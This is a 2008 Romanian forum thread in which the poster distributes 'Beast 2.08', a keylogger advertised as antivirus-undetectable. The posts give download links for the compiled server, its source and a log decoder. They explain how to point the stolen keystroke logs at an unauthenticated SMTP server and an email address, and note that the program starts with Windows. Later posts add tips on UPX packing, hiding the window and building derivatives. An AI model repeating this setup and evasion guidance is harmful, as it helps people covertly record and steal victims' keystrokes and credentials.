puskin Posted May 4, 2008 Report Posted May 4, 2008 Beast 2.08 keyloggerBeast 2.08 este un keylogger nou ce foloseste o metoda "stealth" de "Keyboard hook" este complet nedetectabil si codul sursa este folosit doar la 50% din capacitatea sa (are potential)Cum functioneaza?Ca sa editati setarile server-ului trebuie sa aveti instalat vb6 sa deschideti codul sursa si sa modificati setarile :-limita in Kb la care fisierul Log este trimis pe email;-serverul de SMTP (cautati unul pe portul 25 care sa nu necesite autentificare...)-adresa de email la care sa fie trimis raportul (yahoo, gmail..etc)Server-ul creeaza fisierul de raport in acelasi director in care ruleaza, porneste o data cu windows-ul, verifica conexiunea de internet daca este deschisa sau nu...etcDe asemenea are un fisier cu resurse in caz ca sistemul de operare nu are fisierele necesare (comctl32.ocx, msvbvm60.dll, mswinsck.ocx, scrrun.dll...) pe care le copie automat in fisierul de sistem la executie.Close server F12Download server:http://rapidshare.com/files/113222120/Beast_2.08.exe.htmlDownload source code:http://rapidshare.com/files/112455450/beast208sourcecode.zip.htmlBeast 2.08 KeyloggerBeast 2.08 is a new age keylloger with a stealth method of keyboard hook, it is complete undetect by Av's and the source code is only at 50% of his value exploited.How it's work?To edit the server settings you need to have vb6 and some knowledge of programming.What can be modified:-The limit in kb when the Log file is send on email;-the SMTP address (look for a 25 port with no authorize server)-the email address where the raport log is sentThe server create the report file "log" in the same directori where the app" is running, start with windows, check the internet connection if it's open or not..Have a resource file attached in, in case the system doesn't have the file for running the server(comctl32.ocx, msvbvm60.dll, mswinsck.ocx, scrrun.dll...) this file are copied in sys folder of system on execution.Close server F12 Quote
puskin Posted May 6, 2008 Author Report Posted May 6, 2008 astept sa dezvoltati codul sursa si sa creati programe mai bune decat al meu puteti posta aici creatiile derivate, daca aveti nevoie de help nu ezitati sa ma contactati Codul compresat cu UPX Shell:P.S: a auzit cineva de Ikarus AV???? :) Quote
puskin Posted May 7, 2008 Author Report Posted May 7, 2008 Am atasat si decodorul pentru rapoartele incriptate de pe email:(se salveaza textul criptat intr-un fisier <sysdll.txt> se redenumeste sysdll.txt.uue si se decodeaza)http://rapidshare.com/files/113171368/Beast_2.08y_decoder.exe.htmlDownload Beast 2.08 Email Log Report Decoderhow to use?save the email encrypted text in the deocder folder like this (sysdll.txt.uue) and then decode! Quote
puskin Posted May 7, 2008 Author Report Posted May 7, 2008 in proiect modificati la Form1 in meniu Visible:False !Deasemeni dac nu gaseste locatia fisierelor (nu le poate incarca "load") incarcati doar proiectu in sine si adaugati pe urma fiecare "form" "module" or "add file" pt resource...s.a.m.d Quote
TyrNjord Posted May 11, 2008 Report Posted May 11, 2008 unde pot citi mai multe despre el?nu de alta dar (nu radeti) cred ca m-am infectat:|am salvat serveru pe unde am apucat...si intr-o zi ma uit si...ce kkt ii asta si zdrang dublu click... Quote
andr3y Posted May 11, 2008 Report Posted May 11, 2008 (comctl32.ocx, msvbvm60.dll, mswinsck.ocx, scrrun.dll...) pe care le copie automat in fisierul de sistem la executie.Close server F12El a scris cred ca la asta se refera citeste Quote
puskin Posted May 11, 2008 Author Report Posted May 11, 2008 (comctl32.ocx, msvbvm60.dll, mswinsck.ocx, scrrun.dll...) pe care le copie automat in fisierul de sistem la executie.Close server F12El a scris cred ca la asta se refera citesteil inchizi cu F12 dar la restart apare din nou...msconfig...... Quote